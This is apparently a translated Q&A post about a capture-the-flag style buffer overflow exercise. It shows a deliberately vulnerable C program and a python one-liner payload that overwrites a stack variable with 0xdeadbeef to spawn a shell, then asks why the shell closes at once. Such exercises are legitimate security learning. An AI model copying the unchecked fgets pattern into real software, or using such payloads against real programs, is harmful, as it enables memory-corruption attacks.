【发布时间】:2015-07-17 14:32:33
【问题描述】:
这是要被利用的应用程序的源代码。 ch13.c:
#include <stdlib.h>
#include <stdio.h>
/*
gcc -o ch13 ch13.c -fno-stack-protector
*/
int main()
{
int var;
int check = 0x04030201;
char buf[40];
fgets(buf,45,stdin);
printf("\n[buf]: %s\n", buf);
printf("[check] %p\n", check);
if ((check != 0x04030201) && (check != 0xdeadbeef))
printf ("\nYou are on the right way !\n");
if (check == 0xdeadbeef)
{
printf("Yeah dude ! You win !\n");
system("/bin/dash");
}
return 0;
}
在shell中运行后:
python -c 'print "A"*40 + "\xef\xbe\xad\xde"'|./ch13
它显示缓冲区内容和“是的,伙计!你赢了!”但没有新的外壳。 GDB 显示一个新进程已启动,但我无法与之交互。有没有办法与生成的 shell 交互,使其不会快速终止?
【问题讨论】:
-
你确定系统上有
/bin/dash吗? -
我很好奇你在这个实验中使用的是什么版本的 GCC——我的版本 (5.1.0) 似乎对变量
buf, var, check进行排序,所以溢出只会将一个 nul 字节写入check的第一个字节。我花了 10 分钟弄乱代码,才让变量以正确的顺序放置在堆栈中。 -
我使用 gcc 版本 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5)
标签: c linux shell buffer-overflow